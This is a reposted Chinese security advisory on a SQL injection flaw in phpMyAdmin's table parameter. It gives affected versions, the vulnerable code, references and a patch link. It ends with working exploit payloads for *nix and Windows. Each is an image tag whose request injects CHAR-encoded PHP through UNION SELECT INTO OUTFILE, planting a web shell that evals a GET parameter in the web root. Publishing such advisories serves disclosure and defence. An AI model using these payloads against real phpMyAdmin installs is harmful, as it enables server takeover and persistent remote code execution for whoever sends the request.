欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

phpMyAdmin table参数SQL注入漏洞

程序员文章站 2022-04-07 08:18:06
影响版本: phpMyAdmin phpmyadmin 3.x phpMyAdmin phpMyAdmin 2.11.x 漏洞描述: BUGTRAQ ID: 32720 phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 phpMyAdmin的./php... 09-04-20...
影响版本:
phpmyadmin phpmyadmin 3.x
phpmyadmin phpmyadmin 2.11.x
漏洞描述:
bugtraq id: 32720

phpmyadmin是用php编写的工具,用于通过web管理mysql。

phpmyadmin的./phpmyadmin/libraries/db_table_exists.lib.php文件中没有正确地过滤table参数:

$_result = pma_dbi_try_query(
'select count(*) from `' .
pma_sqladdslashes($table, true) . '`;',
null, pma_dbi_query_store);

pma_sqladdslashes()函数仅禁用了单引号,但忽略了反勾号(`)和双引号("),因此远程攻击者可以通过提交恶意请求执行sql注入攻击。
<*参考
http://secunia.com/advisories/33076/
http://www.phpmyadmin.net/home_page/security/pmasa-2008-10.php
http://www.milw0rm.com/exploits/7382
*>
sebug安全建议:
phpmyadmin
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin?view=rev&revision=12100


*nix平台: <html> <img src="http://10.1.1.10/phpmyadmin/tbl_structure.php?db=information_schema&table=tables%60+where+0+union+select+char%2860%2c+63%2c+112%2c+104%2c+112%2c+32%2c+101%2c+118%2c+97%2c+108%2c+40%2c+36%2c+95%2c+71%2c+69%2c+84%2c+91%2c+101%2c+93%2c+41%2c+63%2c+62%29+into+outfile+%22%2fvar%2fwww%2fbackdoor.php%22+--+1"> </html> path: /var/www/backdoor.php backdoor: <?php eval($_get[e]);?> windows平台: <html> <img src="http://10.1.1.10/phpmyadmin/tbl_structure.php?db=information_schema&table=tables%60+where+0+union+select+char%2860%2c+63%2c+112%2c+104%2c+112%2c+32%2c+101%2c+118%2c+97%2c+108%2c+40%2c+115%2c+116%2c+114%2c+105%2c+112%2c+115%2c+108%2c+97%2c+115%2c+104%2c+101%2c+115%2c+40%2c+36%2c+95%2c+71%2c+69%2c+84%2c+91%2c+101%2c+93%2c+41%2c+41%2c+59%2c+63%2c+62%29+into+outfile+%22c%3a%2fxampp%2fhtdocs%2fbackdoor.php%22+--+1"> </html> path: c:/xampp/htdocs/backdoor.php backdoor: <?php eval(stripslashes($_get[e]));?>